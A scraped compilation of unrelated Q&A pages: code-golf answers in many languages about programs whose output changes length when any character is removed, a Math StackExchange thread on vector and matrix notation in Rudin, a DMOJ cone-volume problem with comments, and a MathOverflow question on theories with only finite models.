1e+308
>>> 11308
11308
>>> 11e08
1100000000.0
>>> 11e38
1.1e+39
>>> 11e30
1.1e+31
But...
>>> 11e308
inf
# JavaScript (and a lot more), 5 bytes
44/44
44/44 -> 1
44/4 -> 11
4444 -> 4444
4/44 -> 0.09090909090909091
# CJam, 5
''''=
Try it online
''''= compares two apostrophes and prints 1
'''= prints '=
'''' prints ''
# Lenguage, 5 bytes
00000
The length of the program is 5 which corresponds to the brainf*** program , reading an end of input character and terminating without output.
Removing any char results in the code 0000 which has a length of 4 corresponding to the brainf*** program . printing out one character (codepoint 0) and terminating.
The Unary equivalent would be 0000000000000 (13 zeros) because you have to prepend a leading 1 to the binary length of the code so 101 becomes 1101.
# Python, 10 8 bytes
256**.25
Works in Python and friends. Thanks to Jakube for showing how to make it 2 bytes smaller.
From IDLE:
>>> 256**.25
4.0
>>> 26**.25
2.2581008643532257
>>> 56**.25
2.7355647997347607
>>> 25**.25
2.23606797749979
>>> 256*.25
64.0
>>> 256*.25
64.0
>>> 256**25
1606938044258990275541962092341162602522202993782792835301376L
>>> 256**.5
16.0
>>> 256**.2
3.0314331330207964
originally I had this (10 bytes):
14641**.25
From IDLE:
>>> 14641**.25
11.0
>>> 4641**.25
8.253780062553423
>>> 1641**.25
6.364688382085818
>>> 1441**.25
6.161209766937384
>>> 1461**.25
6.18247763499657
>>> 1464**.25
6.185648950548194
>>> 14641*.25
3660.25
>>> 14641*.25
3660.25
>>> 14641**25
137806123398222701841183371720896367762643312000384664331464775521549852095523076769401159497458526446001L
>>> 14641**.5
121.0
>>> 14641**.2
6.809483127522302
and on the same note:
121**.25*121**.25
works identically due to nice rounding by Python, in 17 bytes.
>>> 121**.25*121**.25
11.0
>>> 21**.25*121**.25
7.099882579628641
>>> 11**.25*121**.25
6.0401053545372365
>>> 12**.25*121**.25
6.172934291446435
>>> 121*.25*121**.25
100.32789990825084
>>> 121*.25*121**.25
100.32789990825084
>>> 121**25*121**.25
3.8934141282176105e+52
>>> 121**.5*121**.25
36.4828726939094
>>> 121**.2*121**.25
8.654727864164496
>>> 121**.25121**.25
29.821567222277217
>>> 121**.25*21**.25
7.099882579628641
>>> 121**.25*11**.25
6.0401053545372365
>>> 121**.25*12**.25
6.172934291446435
>>> 121**.25*121*.25
100.32789990825084
>>> 121**.25*121*.25
100.32789990825084
>>> 121**.25*121**25
3.8934141282176105e+52
>>> 121**.25*121**.5
36.4828726939094
>>> 121**.25*121**.2
8.654727864164496
• @Akiino I do not understand the edit you made. The line you removed was one of the required possibilities and no different then any of the ones below it. Could you explain why you removed it? I rolled it back, but can concede to undo the action with adequate reasoning. Jan 7 '16 at 19:05
• My inner perfectionist just couldn't sleep well knowing that the line (the one that i removed) is duplicated for no reason. There are lines 56..., 26... and then 56... again, but there is only one way to get 56, so it should be included only once, isn't it?
– user38962
Jan 9 '16 at 12:01
• Oh, I didn't see that it was on there twice. My bad, good catch. Jan 9 '16 at 18:51
• I rolled back my rollback. Jan 9 '16 at 18:52
# PHP, 6 bytes
I have been watching this group for a couple of weeks and am amazed by your programming techniques. Now I had to sign in; there is something I can do, sorry :-) However, this might be my last post here...
<?php
(note the space after second p)
This outputs an empty string. Removing any character outputs the text without that character. Note it can produce HTML errors (content not rendered by browsers for e.g. <?ph).
I also tried with the echo tag. ie. eg.:
<?= __LINE__;;
This one outputs 1. If = is omitted, <? __LINE__;; is the output. However, removing any character of the magic constant will result in E_NOTICE: Notice: Use of undefined constant LNE - assumed 'LNE' in...
If notices are not considered errors (point 4 of rules), this also applies :-)
• Oh, that's clever. I guess a linefeed would work as well. If the task was to produce HTML, this would be invalid. However, PHP can be run from the command line, just like any other programming language, where the output is simply printed to the screen. Jun 25 '15 at 20:43
• @Dennis PHP outputs anything. You can always use CTRL-U in your browser to see the output. HTML might be invalid, but in fact the program is not (there is no <HTML> tag etc.) Jun 25 '15 at 20:45
• My point is that there's no need to involve a browser at all. Just execute php test.php. The second code is invalid by the way. The question does not forbid errors but error output, meaning errors, warning, notices, etc. Jun 25 '15 at 20:48
• #! in a script file also works. Jun 26 '15 at 1:46
# Prolog, 8 bytes
__A=__A.
Note: You cannot remove the final .. Prolog interpreters will always look for a final period to run your query, so if we stick strictly to the rules of this contest and allow ourselves to remove the period it won't run, it will jump a line and wait for additional commands until one is ended by a period.
The original query __A=__A. outputs true..
The query _A=__A. outputs _A = '$VAR'('__A'). Similar modifications (i.e. removing one _ or one of the two As) will result in similar outputs.
Finally, the query __A__A. outputs in SWI-Prolog:
% ... 1,000,000 ............ 10,000,000 years later
%
% >> 42 << (last release gives the question)
• @Jakube I don't see how having a mandatory final period is a lot different than having to input the enter key to run a snippet in another language. If you remove the linefeed it won't run either. Jun 24 '15 at 9:34
• It is more equivalent to a semicolon in some languages, and that does count as a character. Jun 29 '15 at 16:26
# Sed, 1 byte
d
As sed requires an input stream, I'll propose a convention that the program itself should be supplied as input.
$ sed -e 'd' <<<'d' | wc -c
0
\$ sed -e '' <<<'d' | wc -c
2
An alternative program is x, but that only changes from 1 to 2 bytes of output when deleted.
# K, 3 bytes
2!2
Outputs 0 in the REPL. Removing the first 2 outputs 0 1, removing the exclamation mark results in 22, and removing the last 2 results in a string that varies between K implementations but is always at least 2 characters (in oK, it's (2!); according to @Dennis, Kona outputs 2!).
• @Sp3000 Removing the * just prints 2. Removing the 2 prints (*!) (an incomplete function) in oK; I don't know about other interpreters (e.g. Kona, k2, etc.), although I believe Kona would print *[!;] or something similar. I went with removing the star because it seemed the safest. Jun 24 '15 at 1:23
• You can't choose, It must work removing any character Jun 24 '15 at 1:24
• @edc65 Fixed at the expense of not a single byte. Jun 24 '15 at 2:01
• @Dennis Updated. Jun 24 '15 at 14:22
# MATLAB, 9 7 bytes
It's 2 bytes longer than the other MATLAB/Octave answer, but I like it nonetheless, as it's a bit more complex.
MATLAB's ' operator is the complex conjugate transpose. Using it on a scalar imaginary number, you get i' = -i. As imaginary numbers can be written simply as 2i, one can do:
2i--2i'
ans =
0
Removing any one of the characters will result in one of the below:
ans =
0.0000 - 1.0000i
2.0000 - 2.0000i
0.0000 + 4.0000i
0.0000 + 4.0000i
0.0000 + 1.0000i
2.0000 + 2.0000i
0.0000 + 4.0000i
# GolfScript, 2 bytes
This answer is non-competing, but since it is the piece of code that inspired this challenge, I wanted to share it anyway.
:n
By default, all GolfScript programs print the entire stack, followed by a linefeed, by executing puts on the entire stack. The function puts itself is implemented as {print n print} in the interpreter, where print is an actual built-in and n is a variable that holds the string "\n" by default.
Now, a GolfScript program always pushes the input from STDIN on the stack. In this case, since there isn't any input, an empty string is pushed. The variable assignment :n saves that empty string in n, suppressing the implicit linefeed and making the output completely empty.
By eliminating n, you're left with the incomplete variable assignment : (you'd think that's a syntax error, but nope), so the implicit linefeed is printed as usual.
By eliminating :, you're left with n, which pushes a linefeed on the stack, so the program prints two linefeeds.
# J, 5 bytes
|5j12
Magnitude of the complex number 5 + 12i in REPL.
|5j12 NB. original, magnitude of the complex number 5 + 12i
13
5j12 NB. the complex number 5 + 12i
5j12
|j12 NB. magnitude of the undefined function j12
| j12
|512 NB. magnitude of 512
512
|5j2 NB. magnitude of 5 + 2i
5.38516
|5j1 NB. magnitude of 5 + 1i
5.09902
.
# J, 9 bytes
%0.333333
Based on floating point precision, reciprocal and matrix inverse.
%0.333333 NB. original, reciprocal of 0.333333
3
0.333333 NB. 0.333333
0.333333
%.333333 NB. matrix inverse of 333333
3e_6
%0333333 NB. reciprocal of 333333
3e_6
%0.33333 NB. reciprocal of 0.33333
3.00003
Try it online here.
# APL, J and possibly other variants, 3 bytes
--1
It outputs 1 in APL. -1 outputs ¯1, and -- outputs the following in TryAPL:
┌┴┐
- -
# Mathematica, 3 bytes
4!0
4!0 -> 0 the factorial of 4, times 0
4! -> 24 the factorial of 4
40 -> 40
!0 -> !0 the logical not of 0, but 0 is not a boolean value
# Dyalog APL, 2 bytes
⍴0 returns an empty string (length 0)
⍴ returns ⍴ (length 1)
0 returns 0 (length 1)
# Swift (and a lot more), 8 bytes
93^99<84
output (4 chars):
true
When removing the nth character the output is:
n -> out
----------
0 -> false
1 -> false
2 -> false
3 -> false
4 -> false
5 -> 10077
6 -> false
7 -> false
There are 78 possible solutions like this in the format of a^b<c.
I think the goal of this challenge should be as many bytes as possible, because the more bytes, the more possible bytes there are to remove, and therefore the more difficult it is.
• I thought about that, but it would have been too easy for stack-based languages. If this was a code bowling challenge, aditsu would have an infinite score. His code can be repeated over and over again; each copy will do exactly the same. Jun 29 '15 at 23:41
• @Dennis Oh I see, yeah makes sense, but I think bytes are maybe not a very good measure for this task Jun 30 '15 at 1:13
• I agree. That's why it's a popularity contest. Most upvoted answer wins. Jun 30 '15 at 2:05
# MathGolf, 2 bytes
♂(
Try it online!
## Explanation
♂ Push 10
( Decrement TOS by 1
## Why does this work?
The regular output is 9. If the ( is removed, the output is 10. If the ♂ is removed, the program implicitly pops a 0 from the stack to feed the ( operator, which outputs -1.
# 05AB1E (legacy), 1 byte
Any single byte in 05AB1E (legacy) would work, except for [ (infinite loop).
See here all possible outputs for all possible single-byte 05AB1E programs.
Removing that single byte so an empty program remains will output the content of info.txt to STDOUT instead by default.
Try it online.
# 05AB1E, 1 byte
?
Try it online.
Unfortunately an empty program in the new version of 05AB1E only outputs a 1-byte newline by default (Try it online), so almost none of the 1-byte characters are possible since they'll have to output nothing. The only possible program that outputs nothing (so also not the implicit newline) is ? as far as I know.
# Clojure, 11 bytes
(defn x[]1)
At first I thought to just post a single character answer in the REPL like the other languages, e.g.
user=> 1
1
But the problem is that if you remove that character, the REPL doesn't do anything upon the enter keypress. So instead it had to be wrapped with a function as permitted by the question's rules. When you call this function, it returns 1. If you remove the only character in the function,
(defn x[])
the function returns nil which prints an additional two bytes.
user=> (defn x[]1)
#'user/x
user=> (x)
1
user=> (defn y[])
#'user/y
user=> (y)
nil
• To clarify: The contest requires an inner function, which would be 1 in this case (1 byte). Jun 24 '15 at 16:24
# Japt, 2 bytes
AÉ
Try it online!
A is pre-initialized to 10, É subtracts 1, and the result is 1 byte: 9.
Removing É results in the program A, which outputs A's value, 10, so the result is 2 bytes.
Similarly, removing A results in just É which is interpreted as -1 and output as -1, so the result is 2 bytes.
# Runic Enchantments, 6 (modifiable) bytes
11-{{B\
/B~~@/
\00<
R"Error"@
Try it online!
Runic does not have a REPL environment and writing a full program to satisfy the constraints is not readily feasible (leading to either invalid programs or no output). So the portion of the code 11-{{B is acting as an inner function and only this portion can be modified. The B instruction is close enough to a function pointer and return statement that this classification should be acceptable (as it jumps the IP to a position in the code as well as pushing a return location to the stack which may be accessed by a subsequent B or discarded).
• Standard output: 0
• Removing either of the 1s: 05
• Removing the -: 11
• Removing either {: Error051
• Removing the B: 120
The final \ on the end of the first line provides an external boundary around the inner function in the event that the return instruction is removed so that the IP doesn't go meandering all over everywhere willy nilly (and print no output).
Note that Error051 is just an arbitrary string; I could put anything I wanted into that portion of the code, and "Error" was an amusing result for code that messes up the return coordinates so that the IP teleports to an arbitrary location.
|
|
# Confused about notation in Ch.9 of Baby Rudin
So, I am taking a real analysis course, and we are currently on chapter 9 of baby rudin - Functions of Several Variables.
I do not have a strong linear algebra background, so I am having some difficulties with this chapter. I want to have a more intuitive understanding of the notation used in chapter 9, in regards to vectors and matrices.
If we consider $\mathbb{R^n}$ and a standard basis for $\mathbb{R^n}$ is $\{e_1, ..., e_n\}$, then we can write a vector $\mathbf{x}\in\mathbf{R^n}$ with a set of scalars, $\{c_1, ..., c_n \}$ so that
$\mathbf{x} = \sum_i^n c_i\mathbf{e_i}$. Okay, sure. Why this notation though? I always thought of a vector as just a list of components: ie $\mathbf{x} = (c_1x_1, ..., c_nx_n)$. Why are they being summed up here? Moreover, when Rudin goes on to define a matrix, (say $A$) he writes
\begin{bmatrix} a_{11} & a_{12} & a_{13} & \dots & a_{1n} \\ a_{21} & a_{22} & a_{23} & \dots & a_{2n} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ a_{d1} & a_{d2} & a_{d3} & \dots & a_{dn} \end{bmatrix}
However, isn't a matrix just a collection of vectors? Is there a "closed" summation notation for a matrix? Is there a proper, more succinct way to refer to a matrix? Why does he write vectors as summations and matrices as matrices?
And if $A: \mathbb{R^n} \rightarrow \mathbb{R^m}$, and $\{y_1, ..., y_m\}$ is a standard basis for $\mathbb{R^m}$, then why does he write
$A\mathbf{x} = \sum_i^m \sum_j^n a_{ij}c_i\mathbf{y_j}$? Do we really just have a set of scalars in $\mathbb{R^m}$?
• "Why this notation though? I always thought of a vector (in $\Bbb R^n$) as just a list of components." Because it allows us to generalize to alternative bases more easily. For a finite dimensional vector space, given any basis for the space (there are infinitely many choices, some may be more useful at times than others) we are guaranteed by definition to be able to write any vector from the space as a linear combination of the basis vectors, (even if the basis is more exotic than usual). – JMoravitz Apr 23 '18 at 5:16
• "Isn't a matrix just a collection of vectors?" No., it is most commonly thought of as an array of elements where certain operations like multiplication and addition of matrices is defined as we are used to. You can certainly shorthand things and say that the columns are each their own vector, but it kind of loses sight of what the entries technically are. "Is there a closed summation notation" sure... if you really want to. $M_{n\times m}(\Bbb R)$ is isomorphic as a vector space to $\Bbb R^{nm}$ so the same technique as before works here too. – JMoravitz Apr 23 '18 at 5:20
• "then why does he write.... Do we really just have a set of scalars in $\Bbb R^m$?" You seem to have missed that $y_j$ is a vector from $\Bbb R^m$. The expression is a linear combination of vectors from $\Bbb R^m$. – JMoravitz Apr 23 '18 at 5:22
• $\pmatrix{2\\-1\\3}=2\pmatrix{1\\0\\0}+(-1)\pmatrix{0\\1\\0}+3\pmatrix{0\\0\\1}$. – Lord Shark the Unknown Apr 23 '18 at 5:49
• You just need a basic course in linear algebra, and everything will fall into place. – Christian Blatter Apr 23 '18 at 8:29
Vectors are not "lists" of anything. Vectors are elements of vector spaces, i.e. sets of things that behave in a certain way – intuitively, like arrow-vectors from high school: they can be summed together, and they can be scaled by constants. You can find a precise definition of a vector space here.
1. If $V$ is real vector space, a linear combination of vectors is an expression $a_1 v_1 + \cdots + a_kv_k$, for finite $k$, which yields another vector in $V$. So, for example, if $V$ is the set of continuous functions over $(0,1)$, and $v_1,\dots,v_k$ are continuous functions over $(0,1)$, then all their linear combinations are also continuous functions over $(0,1)$ (you should have proved this when you first saw continuity). The numbers $a_i$ are called coefficients of the combination.
2. A subset $S$ of $V$ is said to be linearly independent, or we say that its elements are linearly independent, when there is no linear combination of its elements that yields the zero vector and has at least one non-zero coefficient. In other words, if $S$ is linearly independent and a linear combination of its elements yields the null vector, then all the coefficients must be $0$. Going back to $C^0((0,1))$, you should see that the monomials $\{x^1,\dots, x^k\}$ for $k \geq 2$ are linearly independent, i.e. $a_1 x^1 + \cdots + a_kx^k = 0$ implies $a_1 = \cdots = a_k = 0$. A more intuitive example would be a set of points in $\mathbb R^3$ such that no two points lie on the same line passing through the origin. (This last example helps in visualising that any subset of $V$ that contains the zero vector cannot be linearly independent.)
3. A subset $B$ of $V$ is said to be a (Hamel) basis of $V$ when every vector in $V$ can be written as a linear combination of the elements in a finite subset of $B$, and the elements of $B$ are linearly independent. For example, the set of real polynomials of degree at most two, $\mathbb R_2[x] = \{a_0 + a_1 x + a_2x^2\}$, is a real vector space, and a basis of this space is $\{1,x,x^2\} \subset \mathbb R_2[x]$. Indeed the monomials are linearly independent, and every polynomial in $\mathbb R_2[x]$ can be expressed as a finite linear combination of these three vectors. This choice of basis is not unique: another valid basis is $\{2 - x, -x^2, x + 3x^2\}$. It can be shown that all bases of a vector space have the same number of elements, and that number is the dimension of $V$, $\dim V$.
So, once you have picked a basis, you can show that all $v \in V$ can be expanded as a linear combination of basis vectors in a unique way: $$v = a_1v_1 + \cdots + a_nv_n$$ that is, the coefficients $a_1,\dots,a_n$ are uniquely assigned to $v$. This means that, once a basis $(v_i)$ has been chosen, there is a bijection $\Phi$ between $V$ and $\mathbb R^n$, namely the one sending $v$ to $(a_1,\dots,a_n)$.
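To make this concrete, here is a small numerical sketch (mine, not from the text; it reuses the basis $\{2 - x,\, -x^2,\, x + 3x^2\}$ of $\mathbb R_2[x]$ from above) that computes the unique coordinates of $p(x) = 1 + 4x + 7x^2$ by solving a linear system:

import numpy as np

# columns are the coefficient vectors of the basis polynomials w.r.t. {1, x, x^2}
B = np.array([[2.0, 0.0, 0.0],
              [-1.0, 0.0, 1.0],
              [0.0, -1.0, 3.0]])
p = np.array([1.0, 4.0, 7.0])  # p(x) = 1 + 4x + 7x^2

a = np.linalg.solve(B, p)      # the unique coefficients a_1, a_2, a_3
print(a)                       # [0.5, 6.5, 4.5]
print(B @ a)                   # reconstructs [1, 4, 7], confirming uniqueness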
Now let me define what a matrix is. Technically, you could say that a real matrix $A$ of order $n\times m$ is a map from a subset $\{(i,j) \in \mathbb N^2\ |\ 1 \leq i \leq n, 1 \leq j \leq m\}$ of $\mathbb N^2$ to the real numbers. Intuitively, though, we do not think of a matrix as a map: we prefer to describe it directly by the values it attains, i.e. as an array of numbers
$$A = \begin{bmatrix} a_{11} & \cdots & a_{1m} \\ \vdots & \ddots & \vdots \\ a_{n1} & \cdots & a_{nm} \end{bmatrix}$$
The set of all real $n \times m$ matrices is denoted $M_{n \times m}(\mathbb R)$ and (surprise!) it can be shown that it is a vector space with the natural definition of matrix addition and scalar multiplication. Actually, it turns out that you can even define a matrix product ($\neq$ scalar multiplication!) between matrices of compatible dimensions, $\cdot : M_{n \times m}(\mathbb R) \times M_{m \times k}(\mathbb R) \to M_{n\times k}(\mathbb R)$ such that $A\cdot B = C$ with $c_{ij} = \sum_{l=1}^m a_{il}b_{lj}$.
Back to vectors. Suppose $V$ and $W$ are finite-dimensional real vector spaces of dimensions $n$ and $m$ respectively. A linear map between $V$ and $W$ is a function $f$ such that, for all $v,v' \in V$ and $a,a' \in \mathbb R$, $f(av + a'v') = af(v) + a'f(v')$. The space of all linear functions from $V$ to $W$ is denoted $\mathrm{Hom}(V;W)$. Now let $(v_i)$ be a basis to $V$ and $(w_j)$ a basis to $W$, and let $f \in \mathrm{Hom}(V;W)$. Since every $f(v_i)$ is a member of $W$, we may expand it through the basis $(w_j)$ as $$f(v_i) = \sum_{j=1}^m a_{ij} w_j$$ So, in some sense, once bases have been chosen in the domain and codomain of $f$, there is a correspondence between $f$ itself and a matrix $(a_{ij})$. It turns out that this association has many nice properties, prominently that if $f,g$ are linear maps and $A,B$ their associated matrices, the matrix associated with $f \circ g$ is $A \cdot B$.
Indeed, if $v \in V$ and $w = f(v) \in W$, we may apply the bijection $\Phi$ described above to associate $v$ to the $n$-tuple $(b_1,\dots,b_n) \in \mathbb R^n$, and $w$ to the $m$-tuple $(c_1,\dots,c_m) \in \mathbb R^m$, and then "tip" the tuples to their sides (make them "column vectors", i.e. matrices with one column). Having done this, it is easy to resort to the definition of matrix product and see that, if $(a_{ij})$ is the $m \times n$ matrix associated with $f$, we have $$\begin{bmatrix} c_1 \\ \vdots \\ c_m \end{bmatrix} = \begin{bmatrix} a_{11} & \cdots & a_{1n} \\ \vdots & \ddots & \vdots \\ a_{m1} & \cdots & a_{mn} \end{bmatrix} \begin{bmatrix} b_1 \\ \vdots \\ b_n \end{bmatrix}$$
You may apply this discussion in the case $V = \mathbb R^n$ and $W = \mathbb R^m$, which is the one relevant to analysis. Just notice that in these spaces there is an obvious choice of basis (the so-called standard or canonical basis), i.e. the tuples $\mathbf e_i$ that contain all zeros, except a $1$ in the $i$-th slot. In most cases, at least in analysis, matrices are associated to linear functions with the understanding that canonical bases have been chosen both in the domain and the codomain.
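As an illustration of this correspondence, here is a short sketch (my own; the maps f and g are arbitrary examples) that builds the matrix of a linear map column-by-column from the images of the canonical basis vectors, and checks that composition of maps corresponds to the matrix product:

import numpy as np

def f(v):  # an example linear map R^3 -> R^2
    return np.array([v[0] + 2*v[1], 3*v[2] - v[0]])

def g(v):  # an example linear map R^2 -> R^3
    return np.array([v[0], v[0] + v[1], 2*v[1]])

def matrix_of(h, n):
    # the j-th column of the matrix is h(e_j)
    return np.column_stack([h(np.eye(n)[:, j]) for j in range(n)])

A = matrix_of(f, 3)  # 2 x 3
B = matrix_of(g, 2)  # 3 x 2
print(np.allclose(matrix_of(lambda w: f(g(w)), 2), A @ B))  # True: f o g <-> A . B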
• I strongly suggest this playlist of videos by 3Blue1Brown, that will surely help you get a more intuitive understanding of this topic. youtube.com/playlist?list=PLZHQObOWTQDPD3MizzM2xVFitgF8hE_ab – giobrach Apr 23 '18 at 11:33
• Brilliant answer! The only thing I would add is that, while some things about vector spaces match up with our intuition about arrows, the main "definition" of arrow "vectors" does not hold in general, i.e. vectors do not necessarily have magnitude or direction. If vectors do have magnitude, the space is called a normed space, and if they have direction, it is called an inner product space (which is also a normed space). – AlexanderJ93 Apr 29 '18 at 19:50
• What you point out in your comment is very important. I do not know why some college professors, mostly physicists and engineers, still insist that “scalars only have magnitude, vectors have magnitude and direction,” and so on. It’s just plain wrong, in general. They even clumsily try to extend these concepts to tensors of any rank... IMHO, anyone who needs to learn about tensors should be well versed with the rigorous theory of abstract vector spaces, enough to discard any such gross simplification. – giobrach Apr 29 '18 at 20:00
|
|
## DMOPC '14 Contest 6 P1 - Core Drill
View as PDF
Points: 3 (partial)
Time limit: 2.0s
Memory limit: 64M
Author:
Problem type
Simon got a new drill recently. Everyone knows that a drill is shaped like a right circular cone. Simon knows his drill has radius $r$ and height $h$. But now he wants to calculate the volume. Write a program to help Simon!
#### Input Specification
The first line of input will have an integer $r$.
The second line of input will have an integer $h$.
#### Output Specification
The first line of output should have the volume of Simon's drill. The output will be accepted if it's within an absolute or relative error of .
#### Sample Input
3
5
#### Sample Output
47.12
#### Hint
$\frac{1}{3}\pi r^2 h$ is the volume of the right circular cone with radius $r$ and height $h$.
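For reference, a minimal Python solution sketch (assuming the two integers are read one per line as in the input specification, and that two decimal places suffice, as in the sample):

import math

r = int(input())
h = int(input())
print(f"{math.pi * r * r * h / 3:.2f}")  # r=3, h=5 -> 47.12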
• commented on Sept. 22, 2021, 2:06 p.m.
You need to use the iomanip library if working in C++. Using 3.14 as pi is fine; just make sure to read the variables in the order they appear, otherwise DMOJ might mark your answer as incorrect.
• commented on Sept. 8, 2021, 12:30 p.m.
This is just a simple formula, which can be: double ans = (355.0/339.0) * r * r * h; (note that 355/339 is a rational approximation of π/3) and in C++ use cout << fixed << setprecision(3) << ans << "\n";
• commented on Sept. 8, 2021, 1:21 p.m.
no spoilers :blobhammer:
• commented on Sept. 8, 2021, 7:39 a.m. edited
PI = 3.141592653589793
• commented on July 3, 2020, 11:27 p.m.
What is the value of π? I know it is 3.14159...
but will I round it off to 3.14?
• commented on July 4, 2020, 12:06 p.m. edit 2
If you read the output specification, it says in what cases your output will be accepted. In this case, it is fine to use 3.14 as π. If you have more questions, it would be easier to join the DMOJ Slack to get faster responses instead of commenting on each problem.
|
|
# Fourier transform of a supergausian
1. Aug 28, 2012
### modaniel
Hi,
I was wondering if anyone might know what the analytic fourier transform of a Super-Gaussian is?
cheers
2. Aug 28, 2012
### Mute
That depends on what you mean by "super-Gaussian" distribution. Do you mean fat-tailed distributions? (distributions with tails that fall off rather slowly compared to a Gaussian).
If so, then there are several kinds of fat tailed distributions, each with its own fourier transform. The fourier transform of the probability density function is just the characteristic function for the distribution, which are usually listed on the wikipedia page for the distribution of interest.
3. Aug 28, 2012
### modaniel
Thanks Mute for the reply. The super-Gaussian I refer to is $A\exp(-(\frac{x}{a})^{2n})$, where $n$ is a positive integer and is the order of the super-Gaussian.
4. Aug 28, 2012
### Mute
Hm, that looks tricky. Looking in the integral book Gradshteyn and Ryzhik, I found two useful integrals. The first is
$$\int_0^\infty dx~\exp(-x^\mu) = \frac{1}{\mu}\Gamma\left(\frac{1}{\mu}\right),$$
which holds for $\mbox{Re}(\mu) > 0$ and can be used to find the normalization constant of your distribution. This is integral 3.326-1 in the sixth edition.
There does not appear to be an integral for $\exp(-x^\mu+ix)$, so it's possible there may not be a closed form for the fourier transform. However, you could expand the imaginary exponential in a power series and perform the integral term-by-term to get a power series representation of the fourier transform. In this case, the following integral (3.326-2) is useful:
$$\int_0^\infty dx~x^m \exp(-\beta x^n) = \frac{\Gamma(\gamma)}{n\beta^\gamma},$$
where $\gamma = (m+1)/n$.
5. Aug 29, 2012
### Mute
I should note that a) the series won't actually be a power series (because the moments aren't powers of anything) and b) the series looks like it will be at best an asymptotic series, as $\Gamma((m+1)/n)$ will grow quite large as $m$ gets large, and so the sum won't actually converge.
6. Aug 31, 2012
### modaniel
Hi Mute, thanks for the replies. Looks like I might have to stick to numerical transforms!
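For anyone following the thread, here is a minimal numerical sketch (mine; the parameter values are arbitrary) that approximates the Fourier transform of a super-Gaussian with numpy's FFT and checks the $k=0$ value against the normalization integral quoted above:

import numpy as np
from math import gamma

A, a, n = 1.0, 1.0, 3            # amplitude, width, and order of the super-Gaussian
N, L = 2**14, 40.0               # samples and window half-width (window >> a)

x = np.linspace(-L, L, N, endpoint=False)
dx = x[1] - x[0]
f = A * np.exp(-(x / a)**(2 * n))

# approximate F(k) = integral of f(x) exp(-i k x) dx with a shifted FFT
k = 2 * np.pi * np.fft.fftshift(np.fft.fftfreq(N, d=dx))
F = dx * np.fft.fftshift(np.fft.fft(np.fft.ifftshift(f)))

# sanity check at k = 0: the integral of f, known in closed form
print(F[N // 2].real, A * a * gamma(1 / (2 * n)) / n)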
|
|
# A question about first order theories having only finite models
Does anyone know an example of a mathematically interesting first order theory $T$ such that the following conditions hold?
1. $T$ can be formalized in the classical predicate calculus.
2. It is provable in ZFC that $T$ is consistent and has no infinite models.
3. No upper bound is presently known for the cardinal numbers of the finite models of $T$, even though it has been proved that these models cannot be arbitrarily large.
Take any finite set of finite models of finite signature. The first order theory of that set is what you need (if and only if). – Mark Sapir Oct 7 '11 at 22:24
@Mark: What about (3)? – Emil Jeřábek Oct 7 '11 at 22:53
Not overly interesting, but one could encode some sort of open problem into the size of available models. For example, take sigma to be the sentence "there are at most BB(n) elements," where n is your favorite number and BB(n) is the nth busy beaver number. Obviously you could fit this to whatever natural numbers problem you like, but it's a bit contrived. – Richard Rast Oct 7 '11 at 23:17
What I wanted to say is that your question is about first order theories of finite sets of finite models. Condition (3) is equivalent to asking that the size of the set should be unknown. There are lots of examples. Say, Vinogradov proved that almost all natural numbers are sums of three primes. Consider the set of all natural numbers which are not sums of three primes. This set is finite but we do not know if it is empty. A "number" can be easily viewed as a model in an appropriate signature. So this is (or easily converts to) an example of your theory. – Mark Sapir Oct 7 '11 at 23:28
Thanks for your answers. Using BB(n) may be just what is needed, provided that BB(n) was definable within the theory T. The closest resemblance to T that I could think of was to imagine a "theory" of simple "sporadic" groups before the discovery of the Monster. The only problem was that I do not know what axioms characterize "sporadic" groups and I do not know how to prove that there are no infinite "sporadic" groups. – Garabed Gulbenkian Oct 10 '11 at 14:44
Really, this is just a comment, but it's way too long:
First, a quick observation: assuming your language is finite, every example must be finitely axiomatizable. (Although that finite axiomatization may not be known.)
I want to give two potentially interesting classes of examples: one having a Ramsey-theoretic flavor, and the other coming from complexity theory. I'm hampered by the fact that I don't really know anything about either subject, so what follows is purely speculative.
In model theory, often we want to construct models of a given theory with nice combinatorial patterns - e.g., with indiscernible sequences of a given order-type, etc. I don't know if this is true, but I suspect that in finite model theory, finite combinatorial patterns are also important. Now, suppose I'm given a theory $T$ and a Ramsey-type theorem "Every sufficiently large structure exhibits pattern $P$." Then the 'bad' models of $T$ - those not exhibiting $P$ - are bounded in size, and hence the class of them is axiomatized by a single formula $\varphi$, even if $T$ is not finitely axiomatizable - but no upper bound on this size need be known. Even if an upper bound is known, there is a good chance (Ramsey theory being what it is) that it is truly terrible.
Now, I suspect that these classes of models are interesting only insofar as they make finite model theory difficult, that is, such a class might be relevant for studying the finite model theory of the corresponding theory $T$ but I doubt they are particularly interesting on their own. However, I could be wrong. (I could also be wrong that anything like this is of interest in finite model theory.) Hopefully, someone who actually knows finite model theory will set me straight on this.
Now let me give a class of potential examples coming from complexity theory.
Let $X$ be a set in some 'large' complexity class, say $NEXPTIME$. Call a Turing machine (deterministic or non) $\Phi$ an $X$-guesser if $\Phi(n)=1$ implies $n\in X$; that is, $\Phi$ may not compute $X$, but it never gives false positives.
There may be a collection $\{\Phi_i: i\in\omega\}$ of particularly nice $X$-guessers with extremely small runtime; maybe these arise in trying to 'build $X$ from below' to get a better upper bound on the complexity of $X$. If so, then if $X$ is sufficiently natural and these runtimes really are sufficiently small, we can probably prove that each $\Phi_i$ outputs 1 only finitely many times. Then, for each $i$, the set $X_i=\{n: \Phi_i(n)=1\}$ is a finite set of natural numbers; but upper bounds for these may not be known.
What does this have to do with finite models? Well, take the case where $X\in NEXPTIME$. An old result of ??? shows that the sets of the form $\{n: \exists A\models\varphi (\vert A\vert=n)\}$ (called (finite) spectra) are precisely the sets in $NEXPTIME$. So, given this sequence of sets $X_i$, starting with a formula $\varphi$ corresponding to $X$ we get formulas $\varphi_i$ corresponding to $X_i$ for each $i$. At this point, it's in principle possible that the structure of these formulas can be attacked by finite model theory more efficiently than the sets $X_i$ can be attacked from complexity theory. (Although to the best of my knowledge, this sort of idea isn't nearly as effective as one would hope.) So this would potentially give an interesting sequence of examples of your phenomenon.
I'm sticking to sequences of examples, rather than individual examples, here because I can't imagine a single $X$-guesser with such small runtime being that interesting on its own. Admittedly, I'm also very dubious that any of this is interesting, but it passes my own 'smell' test at least for now.
|
|
## Thinking Mathematically (6th Edition)
$10^4; \\10^3; \\10^2; \\10; \\1$
